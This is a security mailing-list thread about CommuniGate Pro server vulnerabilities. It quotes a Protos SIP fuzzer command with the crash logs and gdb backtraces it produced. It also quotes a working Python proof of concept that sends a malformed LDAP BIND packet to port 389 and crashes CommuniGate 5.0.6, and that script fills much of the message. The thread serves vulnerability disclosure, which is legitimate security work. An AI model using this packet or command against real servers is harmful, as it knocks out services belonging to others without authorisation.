Re: Proof of concept for CommuniGate Pro Server vulnerability

["Evgeny Legerov" <research () gleg 7 com1 ru>]

Hi all,

> "KF (lists)" <kf_lists () digitalmunition com> wrote:
> An SIP issue that was not reported or disclosed was also 
> fixed in the same update. The issue is detailed below.
> You can easily trigger this issue with the Protos SIP 
> toolset.
>
> StarGate:~# java -jar c07-sip-r2.jar -touri 
> kfinisterre@192.168.0.35 -single 2361
>
> Log file snippet:
> Dec  9 16:18:14 localhost CommuniGatePro: CommuniGate 
> Pro Server 5.0.3 started
> Dec  9 16:20:35 localhost CommuniGatePro: Exception 
> signal: 11, trying to recover
> Dec  9 16:20:35 localhost CommuniGatePro: Exception in 
> <STThread 87394E8 UDPReceiver 5060>
> Dec  9 16:21:07 localhost CommuniGatePro: CommuniGate 
> Pro Server 5.0.3 started
> Dec  9 16:21:33 localhost CommuniGatePro: Exception 
> signal: 11, trying to recover
> Dec  9 16:21:33 localhost CommuniGatePro: Exception in 
> <STThread 8738B60 UDPReceiver 5060>
>
>
> 0x4010e3ac in memmove () from /lib/libc.so.6
> (gdb) i r
> eax            0xffffffe0       -32
> ecx            0x1      1
> edx            0xffffffe1       -31
> ebx            0x8699758        141137752
> esp            0xbabff670       0xbabff670
> ebp            0xbabff678       0xbabff678
> esi            0x868eeae        141094574
> edi            0xffffffe0       -32
> eip            0x4010e3ac       0x4010e3ac
>
> (gdb) x/i $pc
> 0x4010e3ac <memmove+92>:        repz movsb 
> %ds:(%esi),%es:(%edi)
>
> (gdb) bt
> #0  0x4010e3ac in memmove () from /lib/libc.so.6
> #1  0x0836cdac in SBMutableData::setBytes ()
> #2  0x08280964 in VSIPPacket::parseFields ()
> #3  0x0827f8da in VSIPPacket::parseData ()
> #4  0x0827c8e8 in VSIP::processReadPacket ()
> #5  0x0827ce83 in VSIP::processUDPRequest ()
> #6  0x081bfeb1 in VUDPListener::receiver ()
> #7  0x081bfa71 in VUDPListener::receiverStarter ()
> #8  0x0838ad1d in STThreadStarter ()
> #9  0x4002af4c in pthread_start_thread () from 
> /lib/libpthread.so.0
> #10 0x4002afda in pthread_start_thread_event () from 
> /lib/libpthread.so.0
> #11 0x4015f92a in clone () from /lib/libc.so.6

Looks interesting, thanks for the info.

Upcoming 5.0.8 version of CommuniGate should have fixes 
for at least two different LDAP bugs (found with ProtoVer 
LDAP 1.4)

> -KF
>
> Evgeny Legerov wrote:
>
> > Hi,
> >
> > The simple code below can be used to reproduce one of 
> > CommuniGate 5.0.6 LDAP vulnerabilities 
> > (http://www.gleg.net/cg_advisory.txt)
> >
> > #!/usr/bin/env python
> > # Use this code at your own risk.
> > # It may crash your server!
> > # Author: Evgeny Legerov
> >
> > import sys
> > import socket
> >
> > HELP="""
> > CommuniGate Pro 5.0.6 vulnerability.
> > Found with ProtoVer LDAP testsuite v1.1
> >
> > Program received signal SIGSEGV, Segmentation fault.
> > [Switching to Thread -1389495376 (LWP 20235)]
> > 0xada99bbc in memcpy () from /lib/libc.so.6
> > (gdb) backtrace
> > #0  0xada99bbc in memcpy () from /lib/libc.so.6
> > #1  0x083924b8 in STCopyCString ()
> > #2  0x08349d5b in BERPackedData::makeCString ()
> > #3  0x081ae71a in VLDAPInput::processBINDrequest ()
> > #4  0x081af747 in VLDAPInput::processInput ()
> > #5  0x082c9373 in VStream::worker ()
> > #6  0x082ca1e9 in VStream::starter ()
> > #7  0x08399e7d in STThreadStarter ()
> > #8  0xadb8bb80 in start_thread () from 
> > /lib/libpthread.so.0
> > #9  0xadaf8dee in clone () from /lib/libc.so.6
> > (gdb) x/i $eip
> > 0xada99bbc <memcpy+28>: repz movsl %ds:(%esi),%es:(%edi)
> > (gdb) info regi esi edi ecx
> > esi            0x8688961        141068641
> > edi            0x86c6fff        141324287
> > ecx            0x3fff7eae       1073708718
> > """
> >
> > print HELP
> >
> > host="localhost"
> > port=389
> >
> > sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
> > sock.connect((host,port))
> >
> > s  = 
> > "\x30\x12\x02\x01\x01\x60\x0d\x02\x01\x03\x04\x02\x44\x4e\x80"
> > s += "\x84\xff\xff\xff\xff"
> >
> > sock.sendall(s)
> > sock.close()
> > 1+1=2

Regards,
Evgeny Legerov